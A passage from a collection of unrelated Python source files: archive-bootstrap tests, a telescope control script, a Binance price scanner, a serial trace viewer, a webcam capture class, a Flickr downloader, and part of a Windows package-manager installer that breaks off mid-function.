sorted(fileList(self.path, relative=True)),
sorted(fileList("cactus/skeleton", relative=True)),
)
class BaseTestArchiveBootstrap(object):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.path = os.path.join(self.test_dir, 'test')
self.skeleton_path = "cactus/skeleton"
self.archive_path = os.path.join(self.test_dir, "archive")
with open(self.archive_path, "wb") as f:
self.make_archive(f)
def make_archive(self, f):
raise NotImplementedError()
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_file(self):
# Test
bootstrap(self.path, self.archive_path)
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList(self.skeleton_path, relative=True)),
)
def test_url(self):
global ServerPort
archive_path = self.archive_path
port = random.choice(xrange(7000, 10000))
server_address = ("127.0.0.1", port)
httpd = HTTPServer(server_address, ArchiveServerHandlerFactory(archive_path))
t = threading.Thread(target=httpd.serve_forever)
t.start()
bootstrap(self.path, "http://127.0.0.1:%s" % port)
httpd.shutdown()
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList(self.skeleton_path, relative=True)),
)
class ZIPTestArchiveBootstrap(BaseTestArchiveBootstrap, unittest.TestCase):
"""
Test ZIP archive support
"""
def make_archive(self, f):
archive = zipfile.ZipFile(f, mode="w")
for resource in fileList(self.skeleton_path, relative=True):
archive.write(os.path.join(self.skeleton_path, resource), resource)
archive.close()
class TARTestArchiveBootstrap(BaseTestArchiveBootstrap, unittest.TestCase):
"""
Test TAR archive support
"""
def make_archive(self, f):
archive = tarfile.open(f.name, fileobj=f, mode="w")
for resource in fileList(self.skeleton_path, relative=True):
archive.add(os.path.join(self.skeleton_path, resource), resource)
archive.close()
|
ocs_start_of_night_process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import multiprocessing
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(multiprocessing.current_process().name))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do start_of_night stuff
if entobj:
# enter control
entobj.logger.info('{0:s}.entercontrol()'.format(entity))
entobj.entercontrol()
# start
entobj.logger.info("{0:s}.start('Normal')".format(entity))
entobj.start('Normal')
# enable
entobj.logger.info('{0:s}.enable()'.format(entity))
entobj.enable()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# created shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = multiprocessing.Process(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s}.exitcode: {1:s}'.format(j.name, str(j.exitcode)))
|
app.py
|
'''
Brick's Scanner
Version: 0.02
Date: 6/6/2021
www.brick.technology
www.coinlab.pro
Notes:
1. This is a quick fun project i made last night. Use this as a launch pad to build your own, more effective scanner.
2. You can add any symbol on binance to the 'coins' list and it will be added to the scanner
3. The scanner looks for a price increase over the last second.
-> If the scanner detects a increase, 'recording' is turned on
-> Currently the code will track price increases over 20s
-> Console prints occur only if the price has kept rising over the past 5-10s
'''
import json, time
import datetime as dt
from websocket import create_connection
from colorama import init, Fore
from threading import Thread
print('----------------------------------- Bricks\'s Scanner ------------------------------------')
print('**************** Updates will only be displayed when conditions are met *****************\n')
print('--------------------------------------- Scanning ----------------------------------------')
# Subscribe to binance /@miniTicker websocket:
coins = ['dogeusdt','btcusdt','ethusdt','linkusdt','uniusdt','algousdt','maticusdt','compusdt','lunausdt','dodousdt','ankrusdt','milusdt','gtcusdt','ampusdt','aaveusdt','adausdt','cakeusdt','bnbusdt','crvusdt','xlmusdt','sushiusdt','grtusdt']
# Parse websocket data into two values: coin, close_price
# Each response is a 'bar'. I chose to use 'c' the value for bar close
def parse_ws(result):
msg = json.loads(result)
return str(msg['s']),float(msg['c'])
# Class assigned to each coin after threading.
class coinData():
def __init__(self,pair,now):
self._coin = pair
self._price = 1
self._now = now
self._record = False
self._record_start_time = 0
self._record_start_price = 0
self._1s = 1
self._5s = 1
self._5s_status = True
self._10s = 1
self._10s_status = True
self._15s = 1
self._15s_status = True
self._20s = 1
self._20s_status = True
# Function for thread processes
def coin_thread(c:str):
ws = create_connection('wss://stream.binance.com:9443/ws/'+c+'@miniTicker')
start = time.time()
coin = coinData(c,start)
# Create infinite loop
while True:
try:
coin._now = time.time()
result = ws.recv()
coin._coin,coin._price = parse_ws(result)
# If the coin's class properity '_record' is set to 'False' - Check the percentage change over the last second
# When the price increases over 1s, switched '_record' to 'True
if coin._record == False:
if coin._price > coin._1s:
print(Fore.WHITE+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 1s Gain '+ str(round(((coin._price - coin._1s)/coin._price)*100,4))+'%')
coin._record_start_time = coin._now
coin._record = True
coin._record_start_price = coin._price
coin._1s = coin._price
else:
coin._1s = coin._price
# When '_record' is set to 'True', calculate the length of time since '_record_start_time' as long as the price is increasing.
# '_record_start_time' is the time the recording of price changes starts
# This gets reset to 0 after the price stops moving up (or after 20s because i have only built support for 20s so far)
else:
if coin._price > coin._record_start_price:
if coin._price > coin._record_start_price and coin._now-coin._record_start_time >= 5 and coin._5s_status == True:
print(Fore.LIGHTCYAN_EX+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 5s Gain '+ str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._5s = coin._price
coin._5s_status = False
elif coin._price > coin._5s and coin._now-coin._record_start_time >= 10 and coin._10s_status == True:
print(Fore.GREEN+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 10s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._10s = coin._price
coin._10s_status = False
elif coin._price > coin._10s and coin._now-coin._record_start_time >= 15 and coin._15s_status == True:
print(Fore.LIGHTMAGENTA_EX+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 15s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._15s = coin._price
coin._15s_status = False
elif coin._price > coin._15s and coin._now-coin._record_start_time >= 20 and coin._20s_status == True:
print(Fore.RED+''+str(dt.datetime.now().strftime('%H:%M:%S'))+' :: '+coin._coin+' :: 20s Gain: '+str(round(((coin._price - coin._record_start_price)/coin._price)*100,4))+'%')
coin._20s = coin._price
coin._20s_status = False
elif coin._price > coin._20s and coin._now-coin._record_start_time >= 20 and coin._20s_status == False:
pass
else:
pass
else:
coin._record = False
coin._1s = coin._price
coin._5s, coin._10s, coin._15s, coin._20s = 0,0,0,0
coin._1s_status, coin._5s_status, coin._10s_status, coin._15s_status, coin._20s_status = True, True, True, True, True
coin._record_start_time = 0
# Handles exceptions from the main while loop
except Exception as e:
print(e)
break
# Crank it up
if __name__ == "__main__":
price_list = []
first_run_flag = 0
init()
[Thread(target=coin_thread, args=(str(x),),).start() for x in coins]
|
tracer.py
|
from sys import argv, stderr
from time import sleep
from json import dumps
from bottle import post, get, request, run
from serial import Serial, SerialException
from pathlib import Path
from threading import Thread
from mekpie.util import file_as_str
from mekpie.cli import panic
from mekpie.cache import project_cache
from .decoder import init_decoder, decode_trace
PORT = 3000
BAUD = 115200
POLL_DELAY = 0.1
MAX_TRACES = 200
trace_log = []
trace_index = 0
@get('/')
def index():
return file_as_str(Path(__file__).parent / 'index.html')
@get('/reset')
def reset():
global trace_index
trace_index = 0
@get('/data')
def data():
global trace_index
i = trace_index
l = len(trace_log)
if i < l:
trace_index = l
return dumps(trace_log[i:l])
else:
return dumps([])
def main(args):
global MAX_TRACES
MAX_TRACES = args.max
if (args.noweb):
trace_listener(True)
else:
thread = Thread(target=trace_listener)
thread.start()
run(host='localhost', port=args.port, debug=args.debug)
thread.join()
def trace_listener(nolog=False):
with connect() as serial:
try:
ti = trace_iter(serial, nolog)
print('[\n ', end='', flush=True)
first_trace = next(ti)
print(dumps(first_trace), end='', flush=True)
for trace in ti:
print(',\n ' + dumps(trace), end='', flush=True)
except KeyboardInterrupt:
pass
finally:
print('\n]')
serial.read_all()
def connect():
port = get_hardware_port()
try:
serial = Serial(port, BAUD, timeout=1)
print(f'Connected to serial port - {port}', file=stderr)
return serial
except SerialException as ex:
panic(ex)
def get_hardware_port():
with project_cache() as cache:
port_key = None
for key in cache.keys():
if key.endswith('cc_avr_gcc.py:config_port'):
port_key = key
if port_key:
return cache[port_key]
else:
panic('Could not find port! Are you sure you ran `mekpie run`?')
def trace_iter(serial, nolog):
init_decoder(serial.read(1))
trace_count = 0
while True:
trace = decode_trace(serial)
if trace:
if not nolog:
trace_count += 1
trace_log.append(trace)
yield trace
if trace.name == 'Debug_Message':
print(trace.message, end='', file=stderr, flush=True)
if trace.name == 'Mark_Halt' or trace_count > MAX_TRACES:
print('\nDone.', file=stderr, flush=True)
return
else:
sleep(POLL_DELAY)
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
if not self._camera.isOpened():
self._camera.open()
# Start a thread to continuously capture frames.
# This must be done because different layers of buffering in the webcam
# and OS drivers will cause you to retrieve old frames if they aren't
# continuously read.
self._capture_frame = None
# Use a lock to prevent access concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an OpenCV
image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the capture image data.
return frame
def stop(self):
print "Terminating..."
|
firs.py
|
import sys
import time
import json
import os
import glob
from pprint import pprint
import threading
import timeit
import times
import requests
import flickr_api
config = json.load(open('./config.json.default'))
TAG = 'philMeta'
API_KEY = config['flickr_api_key']
API_SECRET = config['flickr_api_secret']
REST_ENDPOINT = 'https://api.flickr.com/services/rest/'
SEARCHES_DIR = './search'
IMG_URL = 'http://farm%s.staticflickr.com/%s/%s_%s_z.jpg'
IMG_FNAME = './images/%s/%s-%s.jpg' # query/id-query.jpg
IMG_URL_S = 'http://farm%s.staticflickr.com/%s/%s_%s_q.jpg'
IMG_FNAME_S = './images/%s/%s_square-%s.jpg' # query/id-query.jpg
IMG_DIR = './images/%s' # query
DATA_DIR = './data'
DATA_FNAME = './data/%s.json' # query
NOW = times.now()
TZ = 'America/New_York'
YMD = times.format(NOW, TZ, fmt='%Y-%m-%d')
flickr_api.set_keys(api_key=API_KEY, api_secret=API_SECRET)
def unjsonpify(jsonp):
return jsonp[14:-1] # totally hacky strip off jsonp func
def get_photo_info(photo):
params = {'api_key': API_KEY,
'photo_id': photo['id'],
'secret': photo['secret'],
'method': 'flickr.photos.getInfo',
'format': 'json'}
response = requests.get(REST_ENDPOINT, params=params)
time.sleep(0.5)
return json.loads(unjsonpify(response.text))
def save_image(url, fname):
r = requests.get(url, stream=True)
with open(fname, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
return True
return False
def download_search(results):
t = threading.currentThread()
start = timeit.timeit()
meta = results[TAG]
photos_data = []
if not os.path.isdir(DATA_DIR):
os.makedirs(DATA_DIR)
if not os.path.isdir(IMG_DIR % meta['query']):
os.makedirs(IMG_DIR % meta['query'])
for i, photo in enumerate(results['photos']['photo']):
sys.stdout.write('\rdownloading photo %d/%d (%s)\n' %
(i + 1,
len(results['photos']['photo']),
meta['query']) )
sys.stdout.flush()
info = get_photo_info(photo)
photos_data.append(info['photo'])
img_url = IMG_URL % (photo['farm'],
photo['server'],
photo['id'],
photo['secret'])
img_url_s = IMG_URL_S % (photo['farm'],
photo['server'],
photo['id'],
photo['secret'])
img_fname = IMG_FNAME % (meta['query'], photo['id'], meta['query'])
img_fname_s = IMG_FNAME_S % (meta['query'], photo['id'], meta['query'])
save_image(img_url, img_fname)
save_image(img_url_s, img_fname_s)
end = timeit.timeit()
print end - start
with open(DATA_FNAME % meta['query'], 'w') as f:
json.dump(photos_data, f)
def download_searches(filenames):
for fname in filenames:
with open(fname) as f:
t = threading.Thread(target=download_search, args=(json.load(f),))
t.start()
print('done')
def search(query='pain'):
if not os.path.isdir(SEARCHES_DIR):
os.makedirs(SEARCHES_DIR)
params = {'api_key': API_KEY,
'safe_search': '1', # safest
'media': 'photos', # just photos
'content_type': '1', # just photos
'privacy_filter': '1', # public photos
'license': '1,2,4,5', # see README.md
'per_page': '10', # max=500
'sort': 'relevance',
'method': 'flickr.photos.search',
'format': 'json'}
query_dict = {'text': query}
clean_query = query.replace(' ', '-')
fname = './search/search.%s.%s.json' % (clean_query, YMD)
response = requests.get(REST_ENDPOINT,
params=dict(params, **query_dict))
with open(fname, 'w') as f:
data = json.loads(unjsonpify(response.text))
data[TAG] = {}
data[TAG]['query'] = clean_query
data[TAG]['when'] = YMD
f.write(json.dumps(data))
def keywords_search(args, keywords):
for i, keyword in enumerate(keywords):
sys.stdout.write('\rrunning keyword search... %d/%d (%s)' %
(i + 1, len(keywords), keyword))
sys.stdout.flush()
search(keyword)
time.sleep(1)
print('\ndone')
if __name__ == '__main__':
import argparse
# populate and parse command line options
desc = 'Grab photos from Flickr.'
parser = argparse.ArgumentParser(description=desc)
#parser.add_argument('infile', nargs='?', default=sys.stdin,
# type=argparse.FileType('rU'),
# help='input file (.csv)')
parser.add_argument('-s', '--search', dest='search', action='store_true')
parser.add_argument('-d', '--download', dest='download',
action='store_true')
args = parser.parse_args()
if args.search:
keywords = []
with open('keywords.txt') as f:
keywords = [e.strip() for e in f.readlines()]
keywords_search(args, keywords)
elif args.download:
searches = glob.glob('./search/search.*.json')
download_searches(searches)
else:
pprint(config)
print(parser.print_help())
|
ThreadedInstaller.py
|
######################################################################
# PACKAGE MANAGER #
######################################################################
from logger import log_info, close_log
from Classes.Download import Download
from Classes.Install import Install
from Classes.Packet import Packet
from extension import write, write_debug, write_verbose
from colorama import Fore
import tempfile
import click
import sys
import os
import utils
from zip_utils import set_environment_variable, confirm
paths = {}
class ThreadedInstaller:
def __init__(self, packets, metadata):
self.packets = packets
self.metadata = metadata
def download(self, download: Download):
import cursor
import requests
cursor.hide()
if not os.path.isdir(Rf'{tempfile.gettempdir()}\electric'):
os.mkdir(Rf'{tempfile.gettempdir()}\electric')
path = Rf'{tempfile.gettempdir()}\electric\{download.name}{download.extension}'
with open(path, 'wb') as f:
response = requests.get(download.url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None:
f.write(response.content)
else:
dl = 0
full_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
if not self.metadata.no_progress and not self.metadata.silent:
complete = int(20 * dl / full_length)
fill_c, unfill_c = '█' * \
complete, ' ' * (20 - complete)
try:
sys.stdout.write(
f"\r({fill_c}{unfill_c}) {round(dl / full_length * 100)} % ")
except UnicodeEncodeError:
pass
sys.stdout.flush()
paths.update({
download.display_name:
{
'path': path,
'display_name': download.display_name
}
})
sys.stdout.write('')
def install_package(self, install: Install) -> str:
path = install.path
switches = install.install_switches
download_type = install.download_type
custom_install_switch = install.custom_install_switch
directory = install.directory
if download_type == '.exe':
if '.exe' not in path:
if not os.path.isfile(path + '.exe'):
os.rename(path, f'{path}.exe')
path = path + '.exe'
command = path + ' '
for switch in switches:
command = command + ' ' + switch
if custom_install_switch and directory:
if '/D=' in custom_install_switch:
command += ' ' + custom_install_switch + f'{directory}'
else:
command += ' ' + custom_install_switch + f'"{directory}"'
if custom_install_switch == 'None' and install.directory:
click.echo(click.style(
f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='bright_yellow'))
utils.run_cmd(command.replace('<version>', install.version),
self.metadata, 'installation', install)
elif download_type == '.msi':
command = 'msiexec.exe /i' + path + ' '
for switch in switches:
command = command + ' ' + switch
if custom_install_switch and directory != '' and directory != None:
command = command + ' ' + \
custom_install_switch + rf'"{directory}"'
utils.run_cmd(command.replace('<version>', install.version),
self.metadata, 'installation', install)
def calculate_spwn(self, number: int) -> str:
if number <= 3:
return 'threading'
return 'processing'
def handle_dependencies(self):
for packet in self.packets:
if packet.dependencies:
ThreadedInstaller.install_dependent_packages(
packet, self.metadata.rate_limit, packet.directory, self.metadata)
def handle_multi_download(self) -> list:
from threading import Thread
self.handle_dependencies()
metadata = self.metadata
package_list = [packet.display_name for packet in self.packets]
package_list = str(package_list).replace(
'[', '').replace(']', '').replace('\'', '')
if not metadata.no_color:
write(
f'SuperCached [ {Fore.LIGHTCYAN_EX}{package_list}{Fore.RESET} ]', 'white', metadata)
else:
write(
f'SuperCached [ {package_list} ]', 'white', metadata)
log_info('Initializing Rapid Download', metadata.logfile)
packets = self.packets
download_items = []
if len(packets) > 1:
for idx, packet in enumerate(packets):
download_items.append(Download(packet.win64, packet.win64_type,
f'Setup{idx}', packet.display_name, f"{tempfile.gettempdir()}\\electric\\Setup{idx}{packet.win64_type}"))
elif len(packets) == 1:
download_items.append(Download(packets[0].win64, packets[0].win64_type, 'Setup0',
packets[0].display_name, f"{tempfile.gettempdir()}\\electric\\Setup0{packets[0].win64_type}"))
for item in download_items:
write_verbose(
f'Sending request to {item.url} for downloading {item.display_name}', self.metadata)
write_debug(
f'Downloading {item.display_name} from {item.url} into {item.name}{item.extension}', self.metadata)
method = self.calculate_spwn(len(packets))
if method == 'threading':
threads = [
Thread(target=self.download, args=(item,))
for item in download_items
]
for thread in threads:
thread.start()
for x in threads:
x.join()
if method == 'processing':
from multiprocessing import Process
processes = [Process(
target=self.download, args=(item,)) for item in download_items]
for process in processes:
process.start()
for x in processes:
x.join()
for item in download_items:
if self.metadata.virus_check:
write(
f'\nScanning {item.display_name} For Viruses...', 'bright_cyan', metadata)
utils.check_virus(item.path, metadata, None)
write_debug(
f'Rapid Download Successfully Downloaded {len(download_items)} Packages Using RapidThreading', metadata, newline=True)
write_debug('Rapid Download Exiting With Code 0', metadata)
if not self.metadata.debug:
write('\nSuccessfully Downloaded Installation Files',
'bright_green', metadata)
else:
write('Successfully Downloaded Installation Files',
'bright_green', metadata)
log_info('Finished Rapid Download', metadata.logfile)
write_verbose('Running Installers Using Multi-Threading', metadata)
write(
'Installing Packages', 'cyan', metadata)
log_info(
'Using Rapid Install To Complete Setup, Accept ompts Asking For Admin Permission...', metadata.logfile)
return paths
def generate_installers(self, paths) -> list:
install_items = []
packets = self.packets
install_items = []
if len(packets) > 1:
for pack in packets:
for path in paths.items():
if pack.display_name == path[1]['display_name']:
install_items.append(
Install(
pack.json_name,
pack.display_name, path[1]['path'], pack.install_switches, pack.win64_type, pack.directory, pack.custom_location, pack.install_exit_codes, pack.uninstall_exit_codes, self.metadata, pack.version))
else:
return Install(packets[0].json_name, packets[0].display_name, paths[0][1]['display_name'], packets[0].install_switches, packets[0].win64_type, packets[0].directory, packets[0].custom_location, packets[0].install_exit_codes, packets[0].uninstall_exit_codes, self.metadata, packets[0].version)
return self.generate_split(install_items)
def generate_split(self, install_items) -> list:
exe_list = []
msi_list = []
other_list = []
for item in install_items:
if item.download_type == '.exe':
exe_list.append(item)
elif item.download_type == '.msi':
msi_list.append(item)
else:
other_list.append(item)
install_items = [{'exe': exe_list}, {
'msi': msi_list}, {'other': other_list}]
return install_items
def handle_multi_install(self, paths):
from time import strftime
write_debug('Initialising Rapid Install Procedure...', self.metadata)
processes = []
install_items = self.generate_installers(paths)
idx = 0
for item in install_items:
if 'msi' in list(item.keys()):
for val in item['msi']:
self.install_package(val)
continue
else:
from multiprocessing import Process
string = ''
string = 'other' if 'other' in list(item.keys()) else 'exe'
for val in item[string]:
write_debug(
f'Running Installer For <{val.display_name}> On Thread {item[string].index(val)}', self.metadata)
processes.append(
Process(
target=self.install_package, args=(val,))
)
for process in processes:
process.start()
for x in processes:
x.join()
processes.clear()
idx += 1
if self.metadata.reduce_package:
for path in paths:
os.remove(path)
write('Successfully Cleaned Up Installer From Temp Directory...',
'bright_green', self.metadata)
for packet in self.packets:
metadata = self.metadata
if packet.add_path:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', 'bright_green', metadata)
write_verbose(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', metadata)
log_info(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', metadata.logfile)
utils.append_to_path(packet.add_path.replace(
'<install-directory>', replace_install_dir))
if packet.set_env:
if isinstance(packet.set_env, list):
for obj in packet.set_env:
name = obj['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, obj['value'].replace('<install-directory>', replace_install_dir))
else:
name = packet.set_env['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, packet.set_env['value'].replace('<install-directory>', replace_install_dir))
if packet.shim:
for shim in packet.shim:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
shim = shim.replace(
'<install-directory>', replace_install_dir).replace('<version>', packet.version)
shim_name = shim.split(
"\\")[-1].split('.')[0].replace('<version>', packet.version)
write(
f'Generating Shim For {shim_name}', 'cyan', metadata)
utils.generate_shim(
shim, shim_name, shim.split('.')[-1])
utils.register_package_success(
packet, packet.directory, self.metadata)
write('The PATH environment variable has changed. Run `refreshenv` to refresh your environment variables.', 'green', self.metadata)
write(
'Successfully Installed Packages!', 'bright_magenta', self.metadata)
log_info('Successfully Installed Packages!', self.metadata.logfile)
log_info('Refreshing Environment Variables', self.metadata.logfile)
write_debug(
'Refreshing Env Variables, Calling Batch Script', self.metadata)
write_verbose('Refreshing Environment Variables', self.metadata)
write_debug(
f'Successfully Refreshed Environment Variables', self.metadata)
write_verbose('Installation and setup completed.', self.metadata)
log_info('Installation and setup completed.', self.metadata.logfile)
write_debug(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata)
log_info(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata.logfile)
if self.metadata.logfile:
close_log(self.metadata.logfile, 'Install')
@staticmethod
def install_dependent_packages(packet: Packet, rate_limit: int, install_directory: str, metadata):
from limit import Limiter, TokenBucket
from registry import get_environment_keys
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to install the above dependencies ?')
if continue_install:
write(
f'Installing Dependencies For => {packet.display_name}', 'cyan', metadata)
if len(packet.dependencies) > 1 and len(packet.dependencies) <= 5:
write(
f'Using Parallel Installation For Installing Dependencies', 'bright_green', metadata)
packets = []
for package in packet.dependencies:
res = utils.send_req_package(package)
pkg = res
keys = list(pkg.keys())
idx = 0
for key in keys:
if key not in ['package-name', 'nightly', 'display-name']:
idx = keys.index(key)
break
version = keys[idx]
pkg = pkg[version]
custom_dir = None
if install_directory:
custom_dir = install_directory + \
f'\\{pkg["package-name"]}'
else:
custom_dir = install_directory
install_exit_codes = None
if 'valid-install-exit-codes' in list(pkg.keys()):
install_exit_codes = pkg['valid-install-exit-codes']
packet = Packet(
package,
res['package-name'],
pkg['url'],
pkg['file-type'],
pkg['clswitch'],
pkg['iswitches'],
pkg['uswitches'],
custom_dir,
pkg['dependencies'],
install_exit_codes,
None,
pkg['set-env'] if 'set-env' in list(
pkg.keys()) else None,
pkg['default-install-dir'] if 'default-install-dir' in list(
pkg.keys()) else None,
pkg['uninstall'] if 'uninstall' in list(
pkg.keys()) else [],
pkg['add-path'] if 'add-path' in list(
pkg.keys()) else None,
pkg['checksum'] if 'checksum' in list(
pkg.keys()) else None,
pkg['bin'] if 'bin' in list(pkg.keys()) else None,
pkg['pre-update'] if 'pre-update' in list(
pkg.keys()) else None,
)
installation = utils.find_existing_installation(
package, packet.json_name)
if installation:
write_debug(
f'Aborting Installation As {packet.json_name} is already installed.', metadata)
write_verbose(
f'Found an existing installation of => {packet.json_name}', metadata)
write(
f'Found an existing installation {packet.json_name}.', 'bright_yellow', metadata)
write_verbose(
f'Package to be installed: {packet.json_name}', metadata)
log_info(
f'Package to be installed: {packet.json_name}', metadata.logfile)
write_verbose(
f'Finding closest match to {packet.json_name}...', metadata)
log_info(
f'Finding closest match to {packet.json_name}...', metadata.logfile)
packets.append(packet)
write_verbose(
'Generating system download path...', metadata)
log_info('Generating system download path...',
metadata.logfile)
manager = ThreadedInstaller(packets, metadata)
paths = manager.handle_multi_download()
log_info('Finished Rapid Download...', metadata.logfile)
log_info(
'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
manager.handle_multi_install(paths)
return
else:
write('Starting Sync Installation', 'bright_green', metadata)
for package in packet.dependencies:
res = utils.send_req_package(package)
write(
f'SuperCached [ {Fore.LIGHTCYAN_EX}{res["display-name"]}{Fore.RESET} ]', 'white', metadata)
pkg = res[res['latest-version']]
log_info(
'Generating Packet For Further Installation.', metadata.logfile)
install_exit_codes = None
if 'valid-install-exit-codes' in list(pkg.keys()):
install_exit_codes = pkg['valid-install-exit-codes']
packet = Packet(
res,
res['package-name'],
res['display-name'],
pkg['url'],
pkg['file-type'],
pkg['clswitch'],
pkg['iswitches'],
pkg['uswitches'],
install_directory,
pkg['dependencies'],
install_exit_codes,
[],
None,
False,
pkg['set-env'] if 'set-env' in list(
pkg.keys()) else None,
pkg['default-install-dir'] if 'default-install-dir' in list(
pkg.keys()) else None,
pkg['uninstall'] if 'uninstall' in list(
pkg.keys()) else [],
pkg['add-path'] if 'add-path' in list(
pkg.keys()) else None,
pkg['checksum'] if 'checksum' in list(
pkg.keys()) else None,
pkg['bin'] if 'bin' in list(pkg.keys()) else None,
pkg['pre-update'] if 'pre-update' in list(
pkg.keys()) else None,
)
log_info(
'Searching for existing installation of package.', metadata.logfile)
installation = utils.find_existing_installation(
package, packet.json_name)
if installation:
write_debug(
f'Found existing installation of {packet.json_name}.', metadata)
write_verbose(
f'Found an existing installation of => {packet.json_name}', metadata)
write(
f'Found an existing installation {packet.json_name}.', 'bright_yellow', metadata)
continue
if packet.dependencies:
ThreadedInstaller.install_dependent_packages(
packet, rate_limit, install_directory, metadata)
write_verbose(
f'Package to be installed: {packet.json_name}', metadata)
log_info(
f'Package to be installed: {packet.json_name}', metadata.logfile)
write_verbose(
'Generating system download path...', metadata)
log_info('Generating system download path...',
metadata.logfile)
download_url = packet.win64
log_info('Initializing Rapid Download...',
metadata.logfile)
# Downloading The File From Source
write_debug(
f'Downloading {packet.display_name} from => {packet.win64}', metadata)
write_verbose(
f"Downloading from '{download_url}'", metadata)
log_info(
f"Downloading from '{download_url}'", metadata.logfile)
if rate_limit == -1:
path = utils.download(
download_url, packet.json_name, metadata, packet.win64_type)
else:
log_info(
f'Starting rate-limited installation => {rate_limit}', metadata.logfile)
bucket = TokenBucket(
tokens=10 * rate_limit, fill_rate=rate_limit)
limiter = Limiter(
bucket=bucket,
filename=f'{tempfile.gettempdir()}\Setup{packet.win64_type}',
)
from urllib.request import urlretrieve
urlretrieve(
url=download_url,
filename=f'{tempfile.gettempdir()}\Setup{packet.win64_type}',
reporthook=limiter
)
path = f'{tempfile.gettempdir()}\Setup{packet.win64_type}'
log_info('Finished Rapid Download', metadata.logfile)
if metadata.virus_check:
write('Scanning File For Viruses...',
'bright_cyan', metadata)
utils.check_virus(path, metadata)
write(
f'Installing {packet.display_name}', 'cyan', metadata)
log_info(
'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
write_verbose('Creating registry start snapshot', metadata)
log_info('Creating start snapshot of registry...',
metadata.logfile)
start_snap = get_environment_keys()
write_debug(
f'Installing {packet.json_name} through Setup{packet.win64_type}', metadata)
log_info(
f'Installing {packet.json_name} through Setup{packet.win64_type}', metadata.logfile)
# Running The Installer silently And Completing Setup
utils.install_package(path, packet, metadata)
changes_environment = False
if packet.shim:
changes_environment = True
for shim in packet.shim:
replace_install_dir = ''
if packet.directory:
